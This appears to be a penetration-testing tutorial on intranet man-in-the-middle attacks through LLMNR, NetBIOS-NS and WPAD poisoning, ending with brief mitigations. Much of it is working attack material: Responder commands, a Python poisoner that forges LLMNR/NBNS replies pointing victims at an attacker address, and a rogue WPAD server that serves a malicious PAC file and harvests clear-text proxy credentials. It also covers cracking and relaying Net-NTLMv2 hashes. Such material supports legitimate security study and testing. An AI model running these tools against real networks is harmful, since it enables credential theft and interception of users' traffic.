In intranet penetration tests, one class of attack spoofs the network's configuration and services. It targets the weaknesses created by improperly configured ARP (Address Resolution Protocol), DHCP (Dynamic Host Configuration Protocol) and DNS servers. Another common attack is the man-in-the-middle attack, which lets us obtain sensitive information by intercepting network traffic. Network devices can be hardened against these attacks, but some protocols have inherent weaknesses, so this article uses LLMNR, NetBIOS-NS and the WPAD mechanism to carry out a man-in-the-middle attack.
Let's first understand the DNS query process, as shown in the figure:
The key steps of name resolution on a Windows host in the intranet are:
1 The hosts file in the file system
Configuration file location: C:\Windows\System32\drivers\etc
2 The local DNS cache
CMD command: ipconfig /displaydns
3 Send a DNS request to the DNS server
4 Send an LLMNR query
Used when the DNS query fails
5 Send a NetBIOS-NS query
NetBIOS works at the session layer of the OSI model. NetBIOS is an API, not a protocol between Windows operating systems; on IP networks it is carried by NetBIOS over TCP/IP (NBT).
A computer's NetBIOS name is the same as its computer name (truncated to 15 characters).
What are LLMNR and NetBIOS-NS
LLMNR (Link-Local Multicast Name Resolution) and NetBIOS-NS (NetBIOS Name Service) are two components Windows uses for name resolution and communication. LLMNR was introduced in Windows Vista and later versions as a successor to NetBIOS-NS.
LLMNR provides peer-to-peer name resolution for devices using IPv4, IPv6 or both. It lets IPv4 and IPv6 devices on the same subnet resolve each other's names without a WINS or DNS server, which neither WINS nor DNS fully provides: WINS offers client-server and peer-to-peer name resolution for IPv4 but does not support IPv6, while DNS supports both IPv4 and IPv6 but can only provide resolution through a dedicated server. LLMNR fills this gap by providing resolution when DNS name resolution is unavailable.
LLMNR is used when the DNS server fails to resolve a name. It uses port 5355 (TCP/UDP); the default multicast addresses are IPv4 224.0.0.252 and IPv6 FF02::1:3.
For example, running ping test.local on the intranet first queries the DNS server. When DNS returns no answer, the query is sent again over LLMNR.
The following figure shows the packets captured during query:
NetBIOS is the system API for the local network and has three services:
1 Name service, using UDP port 137 for name registration and name resolution
2 Datagram distribution service, using UDP port 138 for connectionless communication
3 Session service, using TCP port 139 for connection-oriented communication
If the LLMNR query also receives no answer, the host falls back to NetBIOS-NS and broadcasts a NetBIOS name query (NBNS) packet.
These seemingly harmless protocols can be abused in a man-in-the-middle attack to obtain sensitive data such as user names and password hashes: any host on the segment can answer the query, and the victim then authenticates to the attacker.
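The fallback exchange described above, as an added example written for this article (it is not code from the original post or from Responder): a Windows host's LLMNR and NetBIOS-NS queries for a name that DNS could not resolve, and the spoofed answers a poisoner on the same segment sends back. The host name filesrvr and the attacker address 192.168.1.66 are sample values; the wire formats, ports and multicast address are the protocol's own.

```python
"""Build and parse the LLMNR and NetBIOS-NS (NBNS) name queries a Windows
host sends after DNS fails, and the spoofed answers a poisoner returns.
Added example; the IP addresses and host names are sample values."""
import socket
import struct

LLMNR_GROUP = ("224.0.0.252", 5355)  # LLMNR IPv4 multicast group and port
NBNS_PORT = 137                      # NetBIOS name service, UDP broadcast
QTYPE_A = 0x0001                     # DNS/LLMNR A record
QTYPE_NB = 0x0020                    # NetBIOS general name service record
QCLASS_IN = 0x0001


def _dns_name(name: str) -> bytes:
    """Encode a dotted name as DNS labels (LLMNR reuses the DNS wire format)."""
    labels = [p.encode("ascii") for p in name.split(".") if p]
    return b"".join(bytes([len(p)]) + p for p in labels) + b"\x00"


def _skip_name(pkt: bytes, pos: int) -> int:
    """Return the offset just past a label sequence starting at pos."""
    while pkt[pos]:
        pos += 1 + pkt[pos]
    return pos + 1


def nbns_encode(name: str, suffix: int = 0x20) -> bytes:
    """NetBIOS first-level encoding: pad the name to 15 bytes, append the service
    suffix (0x20 = File Server), then split each byte into two nibbles and add
    'A' (0x41) to each. The result is a single 32-byte label plus terminator."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)
    return bytes([32]) + enc + b"\x00"


def nbns_decode(label: bytes) -> tuple:
    """Reverse nbns_encode for a 32-byte label: returns (name, suffix)."""
    raw = bytes(((hi - 0x41) << 4) | (lo - 0x41) for hi, lo in zip(label[0::2], label[1::2]))
    return raw[:15].decode("ascii").rstrip(), raw[15]


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Query a host multicasts to 224.0.0.252:5355 after DNS returns nothing."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + _dns_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)


def build_nbns_query(name: str, txid: int) -> bytes:
    """Query a host broadcasts on UDP/137 after LLMNR also fails
    (flags 0x0110: recursion desired + broadcast)."""
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    return header + nbns_encode(name) + struct.pack(">HH", QTYPE_NB, QCLASS_IN)


def parse_query(pkt: bytes) -> dict:
    """Extract transaction id, queried name and qtype from either protocol."""
    txid = struct.unpack(">H", pkt[:2])[0]
    end = _skip_name(pkt, 12)
    qtype, _qclass = struct.unpack(">HH", pkt[end:end + 4])
    name_bytes = pkt[12:end]
    if qtype == QTYPE_NB and name_bytes[0] == 32:
        name, _suffix = nbns_decode(name_bytes[1:33])
    else:
        labels, pos = [], 12
        while pkt[pos]:
            labels.append(pkt[pos + 1:pos + 1 + pkt[pos]])
            pos += 1 + pkt[pos]
        name = b".".join(labels).decode("ascii")
    return {"txid": txid, "name": name, "qtype": qtype, "question": pkt[12:end + 4]}


def build_poisoned_reply(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """Answer any captured query with the attacker's address, as a poisoner does.
    The victim then connects to attacker_ip and authenticates (SMB/HTTP NTLM)."""
    q = parse_query(query)
    ip = socket.inet_aton(attacker_ip)
    name = q["question"][:-4]
    if q["qtype"] == QTYPE_NB:
        # NBNS reply: response + authoritative + recursion desired; no question echoed.
        header = struct.pack(">HHHHHH", q["txid"], 0x8500, 0, 1, 0, 0)
        rdata = struct.pack(">H", 0x0000) + ip  # NB_FLAGS 0x0000: unique name, B-node
        return header + name + struct.pack(">HHIH", QTYPE_NB, QCLASS_IN, ttl, len(rdata)) + rdata
    # LLMNR reply: response flag set, question echoed, one A record.
    header = struct.pack(">HHHHHH", q["txid"], 0x8000, 1, 1, 0, 0)
    return header + q["question"] + name + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, 4) + ip


def extract_answer_ip(reply: bytes) -> str:
    """Read the address a victim would take from the first answer record."""
    qdcount = struct.unpack(">H", reply[4:6])[0]
    pos = 12
    for _ in range(qdcount):               # skip echoed question(s)
        pos = _skip_name(reply, pos) + 4
    pos = _skip_name(reply, pos)
    rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", reply[pos:pos + 10])
    rdata = reply[pos + 10:pos + 10 + rdlen]
    return socket.inet_ntoa(rdata[2:6] if rtype == QTYPE_NB else rdata[:4])


if __name__ == "__main__":
    for query in (build_llmnr_query("filesrvr", 0x1234), build_nbns_query("filesrvr", 0xABCD)):
        spoofed = build_poisoned_reply(query, "192.168.1.66")
        print(f"{parse_query(query)['name']} -> {extract_answer_ip(spoofed)}")
```

Two details matter for detection as well as for attack: the poisoner only needs to copy the transaction id and echo the name, since neither protocol authenticates answers, and an NBNS name on the wire is the 32-character first-level encoding (FILESRVR becomes EGEJEMEFFDFC...), which is why raw captures of port 137 traffic look nothing like the host name typed by the user.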
Test examples
Attack scenario simulation
Implementation
Recommended tools:
1 https://github.com/SpiderLabs/Responder
2 Metasploit: https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response
3 https://github.com/byt3bl33d3r/MITMf
Brief steps
1 Start Responder on the network interface to poison LLMNR/NBT-NS queries and capture traffic (for example Responder.py -I eth0)
2 On the victim, try to connect to \\filesrvr (a host name that does not exist, so DNS fails and the client falls back to LLMNR and NetBIOS-NS)
3 Responder answers with its own IP, the client authenticates to it over SMB, and we capture the NTLMv2 challenge-response (Net-NTLMv2) hash
4 With the Net-NTLMv2 hash we can either crack it offline (for example hashcat mode 5600) or relay it to another host with an NTLM relay tool. Note that a captured Net-NTLMv2 challenge-response is not the NT hash and cannot be used directly for pass-the-hash.
Using WPAD
What is WPAD
In general, for security reasons employees are not allowed to access external services directly, but they are allowed to reach external resources through a web proxy. Because configuring the proxy by hand is a burden for employees, companies usually use WPAD to configure it automatically.
WPAD (Web Proxy Auto-Discovery Protocol) is a way for clients to discover the URL of the proxy configuration script (a PAC file, by convention wpad.dat) through DHCP or DNS. Once the browser (for example IE) locates and downloads the script, the script's FindProxyForURL function selects the appropriate proxy for each URL. Mainstream browsers generally support WPAD.
How WPAD works
A client that wants to configure its proxy automatically needs to fetch wpad.dat. It first asks the DHCP server; if DHCP is not configured with WPAD, it looks for a host named wpad in its own domain and fetches the file from there. The steps are:
1 If the DHCP server is configured with WPAD (option 252), get the URL of the wpad.dat file from DHCP and skip to step 4. Otherwise go to the next step
2 Send a DNS query for wpad.test.local (wpad prefixed to the client's domain) and fetch the proxy configuration file from it. If successful skip to step 4, otherwise go to the next step
3 Send an LLMNR query for the wpad name. If successful skip to step 4; if not, automatic proxy configuration fails
4 Download wpad.dat and apply the configuration
Step 1 can be attacked with DHCP spoofing and step 2 with DNS spoofing, but both can be prevented by properly configuring the network devices. Step 3 is different: the LLMNR query is multicast to every host on the link, so any attacker on the segment can answer it as if it were the WPAD server and deliver its own wpad.dat to the client.
It is important to note that WPAD is built into the Windows operating system. The setting can be seen in the LAN settings of Internet Explorer ("Automatically detect settings"), as shown in the following diagram:
Exploiting WPAD with Responder
Responder is a good utility for this man-in-the-middle attack. Started with its WPAD rogue proxy enabled (-w), Responder answers the client's name query for wpad and serves a fake wpad.dat that points the client's proxy at the attacker. Its fake HTTP server then demands authentication for the proxied requests; with forced Basic authentication (-F -b) the browser shows a login prompt and the employee's domain account and password arrive in clear text, whereas the default NTLM challenge yields a Net-NTLMv2 hash to crack or relay.
The following is a topology of the WPAD man-in-the-middle attack:
To use Responder:
1 Start the fake WPAD/HTTP server and wait for the client's account and password
2 The client sees Responder's fake login box
3 The clear-text credentials obtained are as follows
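The three steps above, and the wpad.dat download from the discovery sequence in the previous section, as an added example written for this article (it is not Responder's code): a minimal rogue WPAD server that hands out a PAC file pointing at the attacker, answers the first proxied request with a 407 Basic challenge, and decodes the credentials the browser sends back after the user fills in the login box. The attacker address 192.168.1.66, port 3128, realm and the sample account are constructed values.

```python
"""Pieces of a rogue WPAD server: the wpad.dat a victim downloads, the 407
challenge that produces a login box, and the clear-text Basic credentials the
browser then sends. Added example; host names and credentials are samples."""
import base64

ATTACKER_IP = "192.168.1.66"  # sample: the host the victim is tricked into using as proxy
PROXY_PORT = 3128             # sample proxy port


def make_pac(proxy_host: str = ATTACKER_IP, proxy_port: int = PROXY_PORT) -> str:
    """A PAC file (JavaScript run by the browser) routing every URL except plain
    local names through the attacker. This is the shape of a poisoned wpad.dat."""
    return (
        "function FindProxyForURL(url, host) {\n"
        '  if (isPlainHostName(host) || shExpMatch(host, "localhost")) return "DIRECT";\n'
        f'  return "PROXY {proxy_host}:{proxy_port}";\n'
        "}\n"
    )


def http_response(status: str, headers: dict, body: bytes = b"") -> bytes:
    """Serialise a minimal HTTP/1.1 response."""
    lines = [f"HTTP/1.1 {status}"] + [f"{k}: {v}" for k, v in headers.items()]
    lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def parse_request(raw: bytes) -> tuple:
    """Split an HTTP request into (method, target, lower-cased header dict)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return method, target, headers


def parse_basic_credentials(headers: dict):
    """Return (user, password) from a Basic Proxy-Authorization header, else None.
    NTLM/Negotiate tokens are not clear text; those need cracking or relaying."""
    scheme, _, token = headers.get("proxy-authorization", "").partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, _, password = decoded.partition(":")
    return user, password


def handle_request(raw: bytes, realm: str = "Proxy"):
    """Serve the rogue WPAD flow. Returns (response_bytes, captured_credentials)."""
    _method, target, headers = parse_request(raw)
    if target.lower().endswith("/wpad.dat"):
        # Step 4 of WPAD discovery: the client fetches http://wpad/wpad.dat from us.
        body = make_pac().encode()
        return http_response("200 OK", {"Content-Type": "application/x-ns-proxy-autoconfig"}, body), None
    creds = parse_basic_credentials(headers)
    if creds is None:
        # A Basic challenge makes the browser show a login box for the "proxy".
        challenge = {"Proxy-Authenticate": f'Basic realm="{realm}"', "Connection": "close"}
        return http_response("407 Proxy Authentication Required", challenge), None
    # Credentials arrived in clear text; send the client on its way.
    return http_response("302 Found", {"Location": target, "Connection": "close"}), creds


def client_basic_request(user: str, password: str, url: str = "http://www.example.com/") -> bytes:
    """What the victim's browser sends to the proxy after the user fills the box."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return (f"GET {url} HTTP/1.1\r\nHost: www.example.com\r\n"
            f"Proxy-Authorization: Basic {token}\r\n\r\n").encode()


if __name__ == "__main__":
    pac, _ = handle_request(b"GET /wpad.dat HTTP/1.1\r\nHost: wpad\r\n\r\n")
    print(pac.decode())
    challenge, _ = handle_request(b"GET http://www.example.com/ HTTP/1.1\r\nHost: www.example.com\r\n\r\n")
    print(challenge.decode())
    _, captured = handle_request(client_basic_request("TEST\\jdoe", "P!ssw0rd"))
    print("captured:", captured)
```

The point the example makes concrete is why the Basic variant is so damaging: the browser encodes DOMAIN\user and password with base64 only, so anyone holding the proxy socket reads them directly, and nothing in WPAD authenticates the server that supplied the PAC file in the first place.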
Methods to mitigate WPAD attacks
1 Create a DNS record for the wpad host on the DNS server (pointing at the legitimate proxy configuration or a sinkhole), so the query is answered by DNS and never falls through to LLMNR
2 Use Group Policy to disable automatic detection of proxy settings in all browsers across the domain
Disabling LLMNR and NetBIOS over TCP/IP via Group Policy also removes the fallback path that both attacks in this article rely on.